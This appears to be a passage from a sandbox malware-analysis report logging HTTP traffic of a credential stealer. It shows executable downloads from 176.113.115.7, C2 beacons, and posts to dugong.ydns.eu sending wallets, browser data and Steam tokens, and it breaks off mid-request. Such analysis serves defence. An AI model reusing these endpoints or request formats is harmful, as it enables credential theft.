                                                Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 31 31 31 38 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10111180101&unit=246122658369
                                                Source: global trafficHTTP traffic detected: GET //kj2h34kj23h4/freebl3.dll HTTP/1.1Host: dugong.ydns.euCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                                Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                                                Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 176.113.115.7
                                                Source: global trafficHTTP traffic detected: GET //kj2h34kj23h4/mozglue.dll HTTP/1.1Host: dugong.ydns.euCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global trafficHTTP traffic detected: GET //kj2h34kj23h4/msvcp140.dll HTTP/1.1Host: dugong.ydns.euCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET //kj2h34kj23h4/nss3.dll HTTP/1.1Host: dugong.ydns.euCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                                Source: global trafficHTTP traffic detected: GET //kj2h34kj23h4/softokn3.dll HTTP/1.1Host: dugong.ydns.euCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET //kj2h34kj23h4/vcruntime140.dll HTTP/1.1Host: dugong.ydns.euCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 31 31 31 39 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10111190101&unit=246122658369
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECFHDBAAECAAKFHDHIIHost: dugong.ydns.euContent-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJEHost: dugong.ydns.euContent-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 32 64 33 66 62 62 66 30 65 39 63 64 31 39 30 63 34 30 30 35 32 36 32 61 36 38 31 30 37 39 65 36 32 39 30 64 33 64 36 65 32 34 32 37 31 35 39 34 34 64 65 66 66 63 38 36 66 38 61 30 36 33 37 64 32 64 39 38 38 38 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 2d 2d 0d 0a Data Ascii: ------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="token"b12d3fbbf0e9cd190c4005262a681079e6290d3d6e242715944deffc86f8a0637d2d9888------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="message"wallets------HIIIDAKKJJJKKECAKKJE--
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBGHIIDAECBFIDHIIDGHost: dugong.ydns.euContent-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 32 64 33 66 62 62 66 30 65 39 63 64 31 39 30 63 34 30 30 35 32 36 32 61 36 38 31 30 37 39 65 36 32 39 30 64 33 64 36 65 32 34 32 37 31 35 39 34 34 64 65 66 66 63 38 36 66 38 61 30 36 33 37 64 32 64 39 38 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 2d 2d 0d 0a Data Ascii: ------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="token"b12d3fbbf0e9cd190c4005262a681079e6290d3d6e242715944deffc86f8a0637d2d9888------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="message"files------JDBGHIIDAECBFIDHIIDG--
                                                Source: global trafficHTTP traffic detected: GET /files/martin2/random.exe HTTP/1.1Host: 176.113.115.7
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAAHost: dugong.ydns.euContent-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 32 64 33 66 62 62 66 30 65 39 63 64 31 39 30 63 34 30 30 35 32 36 32 61 36 38 31 30 37 39 65 36 32 39 30 64 33 64 36 65 32 34 32 37 31 35 39 34 34 64 65 66 66 63 38 36 66 38 61 30 36 33 37 64 32 64 39 38 38 38 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 2d 2d 0d 0a Data Ascii: ------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="token"b12d3fbbf0e9cd190c4005262a681079e6290d3d6e242715944deffc86f8a0637d2d9888------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="file"------GHDHJEBFBFHJECAKFCAA--
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIJJKKFHIEHJKECGCGCHost: dugong.ydns.euContent-Length: 123223Connection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJEGCGDGHCBFHIDHDAAHost: dugong.ydns.euContent-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 43 47 44 47 48 43 42 46 48 49 44 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 32 64 33 66 62 62 66 30 65 39 63 64 31 39 30 63 34 30 30 35 32 36 32 61 36 38 31 30 37 39 65 36 32 39 30 64 33 64 36 65 32 34 32 37 31 35 39 34 34 64 65 66 66 63 38 36 66 38 61 30 36 33 37 64 32 64 39 38 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 43 47 44 47 48 43 42 46 48 49 44 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 43 47 44 47 48 43 42 46 48 49 44 48 44 41 41 2d 2d 0d 0a Data Ascii: ------JJJEGCGDGHCBFHIDHDAAContent-Disposition: form-data; name="token"b12d3fbbf0e9cd190c4005262a681079e6290d3d6e242715944deffc86f8a0637d2d9888------JJJEGCGDGHCBFHIDHDAAContent-Disposition: form-data; name="message"ybncbhylepme------JJJEGCGDGHCBFHIDHDAA--
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBAFCBKFIDGCAKKKFCHost: dugong.ydns.euContent-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 32 64 33 66 62 62 66 30 65 39 63 64 31 39 30 63 34 30 30 35 32 36 32 61 36 38 31 30 37 39 65 36 32 39 30 64 33 64 36 65 32 34 32 37 31 35 39 34 34 64 65 66 66 63 38 36 66 38 61 30 36 33 37 64 32 64 39 38 38 38 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 43 2d 2d 0d 0a Data Ascii: ------IIEBAFCBKFIDGCAKKKFCContent-Disposition: form-data; name="token"b12d3fbbf0e9cd190c4005262a681079e6290d3d6e242715944deffc86f8a0637d2d9888------IIEBAFCBKFIDGCAKKKFCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------IIEBAFCBKFIDGCAKKKFC--
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: dugong.ydns.euConnection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBAEGCGCGIEGDHIDHJJEHost: dugong.ydns.euContent-Length: 213Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 31 45 34 41 34 45 36 36 30 39 32 36 35 33 37 36 34 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 72 61 66 66 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 2d 2d 0d 0a Data Ascii: ------DBAEGCGCGIEGDHIDHJJEContent-Disposition: form-data; name="hwid"491E4A4E66092653764225------DBAEGCGCGIEGDHIDHJJEContent-Disposition: form-data; name="build"traff1------DBAEGCGCGIEGDHIDHJJE--
                                                Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 31 31 32 30 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10111200101&unit=246122658369
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAFIJKKEHJDHJKFIECAHost: dugong.ydns.euContent-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 61 39 38 62 37 66 64 39 34 66 38 65 36 31 37 33 33 35 35 35 31 33 30 33 33 39 65 30 61 32 36 61 30 66 37 66 32 39 61 66 35 37 30 62 35 64 66 30 32 38 34 30 66 31 32 31 63 39 66 39 37 61 34 39 33 38 33 33 30 62 37 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 2d 2d 0d 0a Data Ascii: ------BAAFIJKKEHJDHJKFIECAContent-Disposition: form-data; name="token"ca98b7fd94f8e61733555130339e0a26a0f7f29af570b5df02840f121c9f97a4938330b7------BAAFIJKKEHJDHJKFIECAContent-Disposition: form-data; name="message"browsers------BAAFIJKKEHJDHJKFIECA--
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGHIDBKJEGIECBGIEHCHost: dugong.ydns.euContent-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 61 39 38 62 37 66 64 39 34 66 38 65 36 31 37 33 33 35 35 35 31 33 30 33 33 39 65 30 61 32 36 61 30 66 37 66 32 39 61 66 35 37 30 62 35 64 66 30 32 38 34 30 66 31 32 31 63 39 66 39 37 61 34 39 33 38 33 33 30 62 37 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 2d 2d 0d 0a Data Ascii: ------GDGHIDBKJEGIECBGIEHCContent-Disposition: form-data; name="token"ca98b7fd94f8e61733555130339e0a26a0f7f29af570b5df02840f121c9f97a4938330b7------GDGHIDBKJEGIECBGIEHCContent-Disposition: form-data; name="message"plugins------GDGHIDBKJEGIECBGIEHC--
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEHHost: dugong.ydns.euContent-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 61 39 38 62 37 66 64 39 34 66 38 65 36 31 37 33 33 35 35 35 31 33 30 33 33 39 65 30 61 32 36 61 30 66 37 66 32 39 61 66 35 37 30 62 35 64 66 30 32 38 34 30 66 31 32 31 63 39 66 39 37 61 34 39 33 38 33 33 30 62 37 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 2d 2d 0d 0a Data Ascii: ------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="token"ca98b7fd94f8e61733555130339e0a26a0f7f29af570b5df02840f121c9f97a4938330b7------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="message"fplugins------HJJJECFIECBGDGCAAAEH--
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJJKKJJDAAAAAKFHJJHost: dugong.ydns.euContent-Length: 7091Connection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global trafficHTTP traffic detected: GET //kj2h34kj23h4/sqlite3.dll HTTP/1.1Host: dugong.ydns.euCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /files/qqdoup/random.exe HTTP/1.1Host: 176.113.115.7
                                                Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 31 31 32 31 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10111210101&unit=246122658369
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDHCGHDHIDHCBGCBGCAEHost: dugong.ydns.euContent-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 61 39 38 62 37 66 64 39 34 66 38 65 36 31 37 33 33 35 35 35 31 33 30 33 33 39 65 30 61 32 36 61 30 66 37 66 32 39 61 66 35 37 30 62 35 64 66 30 32 38 34 30 66 31 32 31 63 39 66 39 37 61 34 39 33 38 33 33 30 62 37 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 